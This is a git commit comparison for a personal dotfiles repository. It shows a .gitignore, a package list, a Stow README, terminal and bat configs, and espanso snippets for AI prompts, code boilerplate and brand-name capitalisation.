Compare commits
10 commits
c1896bf949
...
0c457db7cc
| Author | SHA1 | Date | |
|---|---|---|---|
| 0c457db7cc | |||
| 473e31cfb6 | |||
| 5b6af65def | |||
| 322358755f | |||
| b13376dc1b | |||
| bca1293df3 | |||
| 64889e9013 | |||
| 1c5353187b | |||
| 86ef6ecc90 | |||
| 91d00d6912 |
287 changed files with 55174 additions and 133 deletions
87
.gitignore
vendored
Normal file
87
.gitignore
vendored
Normal file
|
|
@ -0,0 +1,87 @@
|
||||||
|
# API Keys and Secrets (MOST IMPORTANT)
|
||||||
|
opencode/.config/opencode/.mcp.json
|
||||||
|
opencode/*
|
||||||
|
**/REDACTED*
|
||||||
|
**/*secret*
|
||||||
|
**/*key*
|
||||||
|
**/*token*
|
||||||
|
**/*auth*
|
||||||
|
**/*password*
|
||||||
|
|
||||||
|
# Personal/Machine-specific Files
|
||||||
|
ulauncher/.config/ulauncher/ext_preferences/*.db
|
||||||
|
**/*.bak
|
||||||
|
**/*.backup
|
||||||
|
|
||||||
|
# Cache and Temporary Files
|
||||||
|
**/.cache/
|
||||||
|
**/cache/
|
||||||
|
**/*.log
|
||||||
|
**/*.tmp
|
||||||
|
**/*.temp
|
||||||
|
|
||||||
|
# Git hooks (contain samples)
|
||||||
|
.git/hooks/
|
||||||
|
|
||||||
|
# Kanata keyboard configuration (currently unused, conflicts with WhisperTux)
|
||||||
|
kanata/
|
||||||
|
|
||||||
|
# Build artifacts and Python cache
|
||||||
|
a.out
|
||||||
|
**/__pycache__/
|
||||||
|
**/*.pyc
|
||||||
|
|
||||||
|
# Embedded git repositories (should be submodules instead)
|
||||||
|
scripts/grep_for_osint/
|
||||||
|
|
||||||
|
# Old backups
|
||||||
|
.*.old
|
||||||
|
|
||||||
|
# OS and Editor Files
|
||||||
|
.DS_Store
|
||||||
|
.vscode/
|
||||||
|
.idea/
|
||||||
|
**/*~
|
||||||
|
**/*.swp
|
||||||
|
**/*.swo
|
||||||
|
|
||||||
|
# Personal History Files
|
||||||
|
**/*history*
|
||||||
|
|
||||||
|
# Email privacy (git config)
|
||||||
|
**/user.email*
|
||||||
|
**/*@*
|
||||||
|
|
||||||
|
# Runtime and state files
|
||||||
|
**/*.pid
|
||||||
|
**/*.state
|
||||||
|
**/node_modules/
|
||||||
|
**/.env*
|
||||||
|
|
||||||
|
# Espanso - text expansion (may contain passwords, API keys, personal snippets)
|
||||||
|
espanso/
|
||||||
|
.config/espanso/
|
||||||
|
|
||||||
|
# OpenCode - personal AI setup (may contain sensitive prompts/configs)
|
||||||
|
opencode/
|
||||||
|
.config/opencode/
|
||||||
|
|
||||||
|
# Prismus
|
||||||
|
prismis/
|
||||||
|
.config/prismis/
|
||||||
|
|
||||||
|
# Git config (contains personal email/name)
|
||||||
|
git/
|
||||||
|
.env
|
||||||
|
|
||||||
|
# OPSEC - machine-specific configs that reveal infrastructure/workflow
|
||||||
|
systemd-user/
|
||||||
|
kde/
|
||||||
|
applications/
|
||||||
|
autostart/
|
||||||
|
vicinae/
|
||||||
|
whispertux/
|
||||||
|
|
||||||
|
# SSH keys (public or private)
|
||||||
|
*.pub
|
||||||
|
id_*
|
||||||
190
.tools.yaml.old
Normal file
190
.tools.yaml.old
Normal file
|
|
@ -0,0 +1,190 @@
|
||||||
|
# tools.yaml
|
||||||
|
|
||||||
|
necessities:
|
||||||
|
- apt
|
||||||
|
- apt-utils
|
||||||
|
- btop
|
||||||
|
- curl
|
||||||
|
- fd-find
|
||||||
|
- fzf
|
||||||
|
- git
|
||||||
|
- gnupg
|
||||||
|
- gzip
|
||||||
|
- helix
|
||||||
|
- jq
|
||||||
|
- less
|
||||||
|
- mtr
|
||||||
|
- nala
|
||||||
|
- ncdu
|
||||||
|
# - net-tools
|
||||||
|
- parallel
|
||||||
|
- ripgrep
|
||||||
|
- sed
|
||||||
|
- stow
|
||||||
|
- tar
|
||||||
|
- tldr
|
||||||
|
- tmux
|
||||||
|
- util-linux
|
||||||
|
- vim
|
||||||
|
- wget
|
||||||
|
- xclip
|
||||||
|
- xxd
|
||||||
|
- zoxide
|
||||||
|
- zsh
|
||||||
|
|
||||||
|
privacy:
|
||||||
|
- age
|
||||||
|
- aide
|
||||||
|
- clamav
|
||||||
|
- clamtk
|
||||||
|
- gpgv
|
||||||
|
- keepassxc
|
||||||
|
- lynis
|
||||||
|
- mat2
|
||||||
|
- mullvad-browser
|
||||||
|
- protonvpn-cli
|
||||||
|
- veracrypt
|
||||||
|
|
||||||
|
modern_cli:
|
||||||
|
- bat
|
||||||
|
- delta
|
||||||
|
- duf
|
||||||
|
- dust
|
||||||
|
- entr
|
||||||
|
- exa
|
||||||
|
- fd-find
|
||||||
|
- gitui
|
||||||
|
- micro
|
||||||
|
- most
|
||||||
|
- nnn
|
||||||
|
- procs
|
||||||
|
- silversearcher-ag
|
||||||
|
- taskwarrior
|
||||||
|
- tig
|
||||||
|
|
||||||
|
dev:
|
||||||
|
- build-essential
|
||||||
|
- cmake
|
||||||
|
- docker
|
||||||
|
- docker-buildx
|
||||||
|
- docker-compose
|
||||||
|
- gcc-12-base
|
||||||
|
- jq
|
||||||
|
- lazydocker
|
||||||
|
- lazygit
|
||||||
|
- libclang-dev
|
||||||
|
- npm
|
||||||
|
- openjdk-17-jre
|
||||||
|
- pipx
|
||||||
|
- pkg-config
|
||||||
|
- python3-pip
|
||||||
|
- shellcheck
|
||||||
|
- vite
|
||||||
|
|
||||||
|
desktop:
|
||||||
|
- alacritty
|
||||||
|
- cmatrix
|
||||||
|
- feh
|
||||||
|
- flameshot
|
||||||
|
- neofetch
|
||||||
|
- onlyoffice-desktopeditors
|
||||||
|
- pdfsam
|
||||||
|
- redshift-gtk
|
||||||
|
- remmina
|
||||||
|
- ulauncher
|
||||||
|
- vlc
|
||||||
|
- wezterm
|
||||||
|
|
||||||
|
pentest:
|
||||||
|
- auditd
|
||||||
|
- binwalk
|
||||||
|
- fail2ban
|
||||||
|
- fping
|
||||||
|
- foremost
|
||||||
|
- gvm
|
||||||
|
- hashcat
|
||||||
|
- hashid
|
||||||
|
- john
|
||||||
|
- nmap
|
||||||
|
- steghide
|
||||||
|
- tcpdump
|
||||||
|
- testdisk
|
||||||
|
- tshark
|
||||||
|
|
||||||
|
other:
|
||||||
|
- aptitude
|
||||||
|
- deborphan
|
||||||
|
- debsums
|
||||||
|
- entr
|
||||||
|
- evolution
|
||||||
|
- iproute2
|
||||||
|
- iputils-ping
|
||||||
|
- login
|
||||||
|
- netcat-openbsd
|
||||||
|
- screen
|
||||||
|
- software-properties-common
|
||||||
|
- stow
|
||||||
|
- systemd-timesyncd
|
||||||
|
- unzip
|
||||||
|
- usbutils
|
||||||
|
- xdotool
|
||||||
|
- xsel
|
||||||
|
|
||||||
|
wishlist:
|
||||||
|
- atuin # shell history sync
|
||||||
|
- glow # markdown preview
|
||||||
|
- dua-cli # disk usage analyzer
|
||||||
|
|
||||||
|
go_tools:
|
||||||
|
- code_helper
|
||||||
|
- fabric
|
||||||
|
- glow
|
||||||
|
- gum
|
||||||
|
- hugo
|
||||||
|
- katana
|
||||||
|
- lazygit
|
||||||
|
- nuclei
|
||||||
|
- pdtm
|
||||||
|
- termshark
|
||||||
|
- to_pdf
|
||||||
|
- vhs
|
||||||
|
|
||||||
|
rust_tools:
|
||||||
|
- atac
|
||||||
|
- atuin
|
||||||
|
- bandwhich
|
||||||
|
- cargo -> rustup
|
||||||
|
- cargo-clippy -> rustup
|
||||||
|
- cargo-fmt -> rustup
|
||||||
|
- cargo-make
|
||||||
|
- cargo-miri -> rustup
|
||||||
|
- clippy-driver -> rustup
|
||||||
|
- duf
|
||||||
|
- dust
|
||||||
|
- eza
|
||||||
|
- fubar
|
||||||
|
- gping
|
||||||
|
- hexyl
|
||||||
|
- just
|
||||||
|
- makers
|
||||||
|
- navi
|
||||||
|
- onefetch
|
||||||
|
- oniux
|
||||||
|
- procs
|
||||||
|
- rls -> rustup
|
||||||
|
- rust-analyzer -> rustup
|
||||||
|
- rust-gdb -> rustup
|
||||||
|
- rust-gdbgui -> rustup
|
||||||
|
- rust-lldb -> rustup
|
||||||
|
- rust-script
|
||||||
|
- rustc -> rustup
|
||||||
|
- rustdoc -> rustup
|
||||||
|
- rustfmt -> rustup
|
||||||
|
- rustup
|
||||||
|
- sd
|
||||||
|
- taskwarrior
|
||||||
|
- tokei
|
||||||
|
- ttyper
|
||||||
|
- xh
|
||||||
|
- zellij
|
||||||
|
|
||||||
49
README.md
Normal file
49
README.md
Normal file
|
|
@ -0,0 +1,49 @@
|
||||||
|
# Dotfiles Repository
|
||||||
|
|
||||||
|
This repository contains a collection of
|
||||||
|
configuration files for various tools and
|
||||||
|
applications. These dotfiles can be easily deployed
|
||||||
|
using GNU Stow for managing symbolic links to the
|
||||||
|
configuration files.
|
||||||
|
|
||||||
|
## Usage
|
||||||
|
|
||||||
|
### Deploying Dotfiles with GNU Stow
|
||||||
|
|
||||||
|
1. Clone the repository to your local machine:
|
||||||
|
```bash
|
||||||
|
git clone <repository_url>
|
||||||
|
|
||||||
|
2. Navigate to the cloned repository:
|
||||||
|
cd dotfiles
|
||||||
|
|
||||||
|
3. Use GNU Stow to deploy specific configuration
|
||||||
|
files. For example, to deploy the Bash configuration:
|
||||||
|
stow bash
|
||||||
|
|
||||||
|
4. Repeat the stow command for each tool or
|
||||||
|
application you want to deploy configurations for.
|
||||||
|
|
||||||
|
### Additional Instructions
|
||||||
|
|
||||||
|
• Ensure that GNU Stow is installed on your system
|
||||||
|
before deploying the dotfiles.
|
||||||
|
• Customize the configurations as needed before
|
||||||
|
deploying them.
|
||||||
|
• Make sure to back up any existing configuration
|
||||||
|
files that might be overwritten during deployment.
|
||||||
|
|
||||||
|
## Tools Included
|
||||||
|
|
||||||
|
• Alacritty
|
||||||
|
• Bash
|
||||||
|
• Bat
|
||||||
|
• Espanso
|
||||||
|
• Git
|
||||||
|
• Helix
|
||||||
|
• Omp
|
||||||
|
• Procs
|
||||||
|
• Tmux
|
||||||
|
• Ulauncher
|
||||||
|
• Yazi
|
||||||
|
• Zsh
|
||||||
29
alacritty/.config/alacritty/alacritty.toml
Normal file
29
alacritty/.config/alacritty/alacritty.toml
Normal file
|
|
@ -0,0 +1,29 @@
|
||||||
|
[general]
|
||||||
|
live_config_reload = true
|
||||||
|
# import = [] # Add theme files here if needed
|
||||||
|
|
||||||
|
[window]
|
||||||
|
decorations = "None"
|
||||||
|
|
||||||
|
[colors]
|
||||||
|
draw_bold_text_with_bright_colors = true
|
||||||
|
|
||||||
|
[font]
|
||||||
|
size = 11.0
|
||||||
|
|
||||||
|
[font.bold]
|
||||||
|
family = "Fira Code Bold Nerd Font Complete"
|
||||||
|
|
||||||
|
[font.bold_italic]
|
||||||
|
family = "Victor Mono Bold Italic Nerd Font Complete"
|
||||||
|
|
||||||
|
[font.italic]
|
||||||
|
family = "Victor Mono Medium Italic Nerd Font Complete"
|
||||||
|
style = "Italic"
|
||||||
|
|
||||||
|
[font.normal]
|
||||||
|
family = "FiraCode Nerd Font"
|
||||||
|
|
||||||
|
[window.padding]
|
||||||
|
x = 10
|
||||||
|
y = 10
|
||||||
|
|
@ -1,17 +0,0 @@
|
||||||
# ---- TMUX-RECON bash.bash ----
|
|
||||||
|
|
||||||
# source custom aliases if exists
|
|
||||||
[ -f ~/.aliases.sh ] && source ~/.aliases.sh
|
|
||||||
|
|
||||||
# add .scripts to path
|
|
||||||
export PATH="$HOME/.scripts:$PATH"
|
|
||||||
|
|
||||||
# zoxide (if installed)
|
|
||||||
if command -v zoxide &> /dev/null; then
|
|
||||||
eval "$(zoxide init bash)"
|
|
||||||
fi
|
|
||||||
|
|
||||||
# fzf (if installed)
|
|
||||||
[ -f ~/.fzf.bash ] && source ~/.fzf.bash
|
|
||||||
|
|
||||||
# Custom prompt options or PS1 here if desired
|
|
||||||
25
bat/.config/bat/config
Normal file
25
bat/.config/bat/config
Normal file
|
|
@ -0,0 +1,25 @@
|
||||||
|
# This is `bat`s configuration file. Each line either contains a comment or
|
||||||
|
# a command-line option that you want to pass to `bat` by default. You can
|
||||||
|
# run `bat --help` to get a list of all possible configuration options.
|
||||||
|
|
||||||
|
# Specify desired highlighting theme (e.g. "TwoDark"). Run `bat --list-themes`
|
||||||
|
# for a list of all available themes
|
||||||
|
--theme="tokyonight_moon"
|
||||||
|
|
||||||
|
# Enable this to use italic text on the terminal. This is not supported on all
|
||||||
|
# terminal emulators (like tmux, by default):
|
||||||
|
#--italic-text=always
|
||||||
|
|
||||||
|
# Uncomment the following line to disable automatic paging:
|
||||||
|
#--paging=never
|
||||||
|
|
||||||
|
# Uncomment the following line if you are using less version >= 551 and want to
|
||||||
|
# enable mouse scrolling support in `bat` when running inside tmux. This might
|
||||||
|
# disable text selection, unless you press shift.
|
||||||
|
#--pager="less --RAW-CONTROL-CHARS --quit-if-one-screen --mouse"
|
||||||
|
|
||||||
|
# Syntax mappings: map a certain filename pattern to a language.
|
||||||
|
# Example 1: use the C++ syntax for Arduino .ino files
|
||||||
|
# Example 2: Use ".gitignore"-style highlighting for ".ignore" files
|
||||||
|
#--map-syntax "*.ino:C++"
|
||||||
|
#--map-syntax ".ignore:Git Ignore"
|
||||||
1
bat/.config/bat/themes/tokyonight
Normal file
1
bat/.config/bat/themes/tokyonight
Normal file
|
|
@ -0,0 +1 @@
|
||||||
|
/home/$USER/projects/tokyonight.nvim/extras/sublime
|
||||||
42
espanso/.config/espanso/config/default.yml
Normal file
42
espanso/.config/espanso/config/default.yml
Normal file
|
|
@ -0,0 +1,42 @@
|
||||||
|
# espanso configuration file
|
||||||
|
|
||||||
|
# yaml-language-server: $schema=https://raw.githubusercontent.com/espanso/espanso/dev/schemas/config.schema.json
|
||||||
|
|
||||||
|
# For a complete introduction, visit the official docs at: https://espanso.org/docs/
|
||||||
|
|
||||||
|
# You can use this file to define the global configuration options for espanso.
|
||||||
|
# These are the parameters that will be used by default on every application,
|
||||||
|
# but you can also override them on a per-application basis.
|
||||||
|
|
||||||
|
# To make customization easier, this file contains some of the commonly used
|
||||||
|
# parameters. Feel free to uncomment and tune them to fit your needs!
|
||||||
|
|
||||||
|
# --- Toggle key
|
||||||
|
|
||||||
|
# Customize the key used to disable and enable espanso (when double tapped)
|
||||||
|
# Available options: CTRL, SHIFT, ALT, CMD, OFF
|
||||||
|
# You can also specify the key variant, such as LEFT_CTRL, RIGHT_SHIFT, etc...
|
||||||
|
# toggle_key: ALT
|
||||||
|
# You can also disable the toggle key completely with
|
||||||
|
toggle_key: OFF
|
||||||
|
|
||||||
|
# --- Injection Backend
|
||||||
|
|
||||||
|
# Espanso supports multiple ways of injecting text into applications. Each of
|
||||||
|
# them has its quirks, therefore you may want to change it if you are having problems.
|
||||||
|
# By default, espanso uses the "Auto" backend which should work well in most cases,
|
||||||
|
# but you may want to try the "Clipboard" or "Inject" backend in case of issues.
|
||||||
|
# backend: Clipboard
|
||||||
|
|
||||||
|
# --- Auto-restart
|
||||||
|
|
||||||
|
# Enable/disable the config auto-reload after a file change is detected.
|
||||||
|
auto_restart: true
|
||||||
|
|
||||||
|
# --- Clipboard threshold
|
||||||
|
|
||||||
|
# Because injecting long texts char-by-char is a slow operation, espanso automatically
|
||||||
|
# uses the clipboard if the text is longer than 'clipboard_threshold' characters.
|
||||||
|
# clipboard_threshold: 100
|
||||||
|
|
||||||
|
# For a list of all the available options, visit the official docs at: https://espanso.org/docs/
|
||||||
101
espanso/.config/espanso/match/ai-prompts.yml
Normal file
101
espanso/.config/espanso/match/ai-prompts.yml
Normal file
|
|
@ -0,0 +1,101 @@
|
||||||
|
matches:
|
||||||
|
- trigger: ":prompt-improve"
|
||||||
|
replace: |
|
||||||
|
You're an expert at prompt engineering. Please rewrite and improve this prompt to get the best results.
|
||||||
|
|
||||||
|
## PROMPT WRITING KNOWLEDGE
|
||||||
|
|
||||||
|
Tactics:
|
||||||
|
|
||||||
|
Include details in your query to get more relevant answers
|
||||||
|
Ask the model to adopt a persona
|
||||||
|
Use delimiters to clearly indicate distinct parts of the input
|
||||||
|
Specify the steps required to complete a task
|
||||||
|
Provide examples
|
||||||
|
Specify the desired length of the output
|
||||||
|
Provide reference text
|
||||||
|
Language models can confidently invent fake answers, especially when asked about esoteric topics or for citations and URLs. In the same way that a sheet of notes can help a student do better on a test, providing reference text to these models can help in answering with fewer fabrications.
|
||||||
|
|
||||||
|
Tactics:
|
||||||
|
|
||||||
|
Instruct the model to answer using a reference text
|
||||||
|
Instruct the model to answer with citations from a reference text
|
||||||
|
Split complex tasks into simpler subtasks
|
||||||
|
Just as it is good practice in software engineering to decompose a complex system into a set of modular components, the same is true of tasks submitted to a language model. Complex tasks tend to have higher error rates than simpler tasks. Furthermore, complex tasks can often be re-defined as a workflow of simpler tasks in which the outputs of earlier tasks are used to construct the inputs to later tasks.
|
||||||
|
|
||||||
|
- Interpret what the input was trying to accomplish.
|
||||||
|
- Read and understand the PROMPT WRITING KNOWLEDGE above.
|
||||||
|
- Write and output a better version of the prompt using your knowledge of the techniques above.
|
||||||
|
|
||||||
|
# OUTPUT INSTRUCTIONS:
|
||||||
|
|
||||||
|
1. Output the prompt in clean, human-readable Markdown format.
|
||||||
|
2. Only output the prompt, and nothing else, since that prompt might be sent directly into an LLM.
|
||||||
|
|
||||||
|
# INPUT
|
||||||
|
|
||||||
|
The following is the prompt you will improve:
|
||||||
|
|
||||||
|
- trigger: ":prompt-rewrite"
|
||||||
|
replace: |
|
||||||
|
You're an expert technical writer. Rewrite the following text to improve clarity and conciseness while keeping it accurate.
|
||||||
|
|
||||||
|
**Guidelines:**
|
||||||
|
- Assume your audience has intermediate technical knowledge
|
||||||
|
- Replace jargon with plain language where possible
|
||||||
|
- Break up long sentences
|
||||||
|
- Add bullet points if it helps comprehension
|
||||||
|
|
||||||
|
Provide **two variations**, and include a 1-sentence explanation of why each is better.
|
||||||
|
|
||||||
|
**Input:**
|
||||||
|
[Insert your text here]
|
||||||
|
|
||||||
|
- trigger: ":prompt-summarize"
|
||||||
|
replace: |
|
||||||
|
Summarize this technical content for a stakeholder who isn't an engineer.
|
||||||
|
|
||||||
|
**Goals:**
|
||||||
|
- Keep it under 100 words
|
||||||
|
- Focus on the "why it matters"
|
||||||
|
- No acronyms unless explained
|
||||||
|
|
||||||
|
**Example Summary:**
|
||||||
|
“We discovered a performance bottleneck in the database queries, which slowed down our app. We’re optimizing them now to improve user experience.”
|
||||||
|
|
||||||
|
**Input:**
|
||||||
|
[Insert content here]
|
||||||
|
|
||||||
|
- trigger: ":prompt-bugfix"
|
||||||
|
replace: |
|
||||||
|
Act as a senior Python developer. Help debug this code.
|
||||||
|
|
||||||
|
**Instructions:**
|
||||||
|
1. Identify any bugs or bad practices
|
||||||
|
2. Suggest fixes with brief explanation
|
||||||
|
3. Provide a corrected version
|
||||||
|
4. Suggest improvements for readability
|
||||||
|
|
||||||
|
**Input Code:**
|
||||||
|
[Paste your Python code here]
|
||||||
|
|
||||||
|
- trigger: ":prompt-qa"
|
||||||
|
replace: |
|
||||||
|
Based on the following text, generate 5 thoughtful questions that challenge assumptions, test understanding, or uncover edge cases.
|
||||||
|
|
||||||
|
**Context:** Preparing for code reviews and collaborative refinement.
|
||||||
|
|
||||||
|
**Input:**
|
||||||
|
[Insert concept or document]
|
||||||
|
|
||||||
|
- trigger: ":prompt-variations"
|
||||||
|
replace: |
|
||||||
|
You are a creative writer with a technical background.
|
||||||
|
|
||||||
|
Generate **3 variations** of this copy, optimized for different tones:
|
||||||
|
- Formal
|
||||||
|
- Friendly
|
||||||
|
- Technical
|
||||||
|
|
||||||
|
**Input:**
|
||||||
|
[Paste text here]
|
||||||
102
espanso/.config/espanso/match/code-snippets.yml
Normal file
102
espanso/.config/espanso/match/code-snippets.yml
Normal file
|
|
@ -0,0 +1,102 @@
|
||||||
|
matches:
|
||||||
|
# Python imports block
|
||||||
|
- trigger: ":py-imports"
|
||||||
|
replace: |
|
||||||
|
import os
|
||||||
|
import sys
|
||||||
|
import argparse
|
||||||
|
import logging
|
||||||
|
|
||||||
|
# Python entry point
|
||||||
|
- trigger: ":py-main"
|
||||||
|
replace: |
|
||||||
|
if __name__ == "__main__":
|
||||||
|
main()
|
||||||
|
|
||||||
|
# Python logging setup
|
||||||
|
- trigger: ":py-logger"
|
||||||
|
replace: |
|
||||||
|
logging.basicConfig(
|
||||||
|
level=logging.INFO,
|
||||||
|
format="%(asctime)s [%(levelname)s] %(message)s",
|
||||||
|
handlers=[logging.StreamHandler()]
|
||||||
|
)
|
||||||
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
# Bash color template
|
||||||
|
- trigger: ":bash-colors"
|
||||||
|
replace: |
|
||||||
|
RED='\033[0;31m'
|
||||||
|
GREEN='\033[0;32m'
|
||||||
|
YELLOW='\033[1;33m'
|
||||||
|
NC='\033[0m' # No Color
|
||||||
|
|
||||||
|
# Bash shebang + options
|
||||||
|
- trigger: ":bash-head"
|
||||||
|
replace: |
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
set -euo pipefail
|
||||||
|
IFS=$'\n\t'
|
||||||
|
|
||||||
|
# Bash usage function
|
||||||
|
- trigger: ":bash-usage"
|
||||||
|
replace: |
|
||||||
|
usage() {
|
||||||
|
echo "Usage: $0 [options]"
|
||||||
|
echo " -h Show help"
|
||||||
|
exit 1
|
||||||
|
}
|
||||||
|
|
||||||
|
while getopts ":h" opt; do
|
||||||
|
case ${opt} in
|
||||||
|
h ) usage ;;
|
||||||
|
\? ) usage ;;
|
||||||
|
esac
|
||||||
|
done
|
||||||
|
|
||||||
|
- trigger: ":py-args"
|
||||||
|
replace: |
|
||||||
|
import argparse
|
||||||
|
|
||||||
|
parser = argparse.ArgumentParser(description="Script description here.")
|
||||||
|
parser.add_argument("input", help="Input file")
|
||||||
|
parser.add_argument("-v", "--verbose", action="store_true", help="Enable verbose mode")
|
||||||
|
args = parser.parse_args()
|
||||||
|
|
||||||
|
- trigger: ":py-timer"
|
||||||
|
replace: |
|
||||||
|
import time
|
||||||
|
start = time.time()
|
||||||
|
|
||||||
|
# your code here
|
||||||
|
|
||||||
|
print(f"Elapsed time: {time.time() - start:.2f}s")
|
||||||
|
|
||||||
|
- trigger: ":py-path"
|
||||||
|
replace: |
|
||||||
|
from pathlib import Path
|
||||||
|
|
||||||
|
base_path = Path(__file__).resolve().parent
|
||||||
|
data_path = base_path / "data" / "file.csv"
|
||||||
|
|
||||||
|
- trigger: ":bash-log"
|
||||||
|
replace: |
|
||||||
|
log() {
|
||||||
|
echo -e "\\033[1;34m[INFO]\\033[0m $1"
|
||||||
|
}
|
||||||
|
|
||||||
|
- trigger: ":bash-check"
|
||||||
|
replace: |
|
||||||
|
if [ ! -f "$1" ]; then
|
||||||
|
echo "File not found: $1"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
- trigger: ":bash-trap"
|
||||||
|
replace: |
|
||||||
|
cleanup() {
|
||||||
|
echo "Cleaning up..."
|
||||||
|
# Add cleanup commands here
|
||||||
|
}
|
||||||
|
|
||||||
|
trap cleanup EXIT
|
||||||
298
espanso/.config/espanso/match/packages/brand-names.yml
Normal file
298
espanso/.config/espanso/match/packages/brand-names.yml
Normal file
|
|
@ -0,0 +1,298 @@
|
||||||
|
# Brand Names
|
||||||
|
|
||||||
|
matches:
|
||||||
|
- trigger: "1password"
|
||||||
|
replace: "1Password"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "autocad"
|
||||||
|
replace: "AutoCAD"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "autodesk"
|
||||||
|
replace: "Autodesk"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "backblaze"
|
||||||
|
replace: "Backblaze"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "betalist"
|
||||||
|
replace: "BetaList"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "bitcan"
|
||||||
|
replace: "BitCan"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "cafepress"
|
||||||
|
replace: "CafePress"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "chromebook"
|
||||||
|
replace: "Chromebook"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "citroen"
|
||||||
|
replace: "Citroën"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "clearbit"
|
||||||
|
replace: "Clearbit"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "codeship"
|
||||||
|
replace: "Codeship"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "crowdin"
|
||||||
|
replace: "Crowdin"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "devmate"
|
||||||
|
replace: "DevMate"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "dropbox"
|
||||||
|
replace: "Dropbox"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "ebay"
|
||||||
|
replace: "eBay"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "eventbrite"
|
||||||
|
replace: "Eventbrite"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "evernote"
|
||||||
|
replace: "Evernote"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "expandrive"
|
||||||
|
replace: "ExpanDrive"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "facebook"
|
||||||
|
replace: "Facebook"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "fastspring"
|
||||||
|
replace: "FastSpring"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "freshbooks"
|
||||||
|
replace: "FreshBooks"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "freshdesk"
|
||||||
|
replace: "Freshdesk"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "github"
|
||||||
|
replace: "GitHub"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "goodreads"
|
||||||
|
replace: "Goodreads"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "greenfax"
|
||||||
|
replace: "GreenFax"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "hootsuite"
|
||||||
|
replace: "Hootsuite"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "hubspot"
|
||||||
|
replace: "HubSpot"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "indiegogo"
|
||||||
|
replace: "Indiegogo"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "iret"
|
||||||
|
replace: "IRET"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "kickstarter"
|
||||||
|
replace: "Kickstarter"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "kno"
|
||||||
|
replace: "Kno"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "lastpass"
|
||||||
|
replace: "LastPass"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "linkedin"
|
||||||
|
replace: "LinkedIn"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "macphun"
|
||||||
|
replace: "Macphun"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "macupdate"
|
||||||
|
replace: "MacUpdate"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- triggers:
|
||||||
|
- "macos"
|
||||||
|
- "osx"
|
||||||
|
replace: "macOS"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "mailchimp"
|
||||||
|
replace: "MailChimp"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "maximus"
|
||||||
|
replace: "Maximus"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "microsoft"
|
||||||
|
replace: "Microsoft"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
- trigger: "monoprice"
|
||||||
|
replace: "Monoprice"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "newsblur"
|
||||||
|
replace: "NewsBlur"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "papertrail"
|
||||||
|
replace: "Papertrail"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "parkmerced"
|
||||||
|
replace: "Parkmerced"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
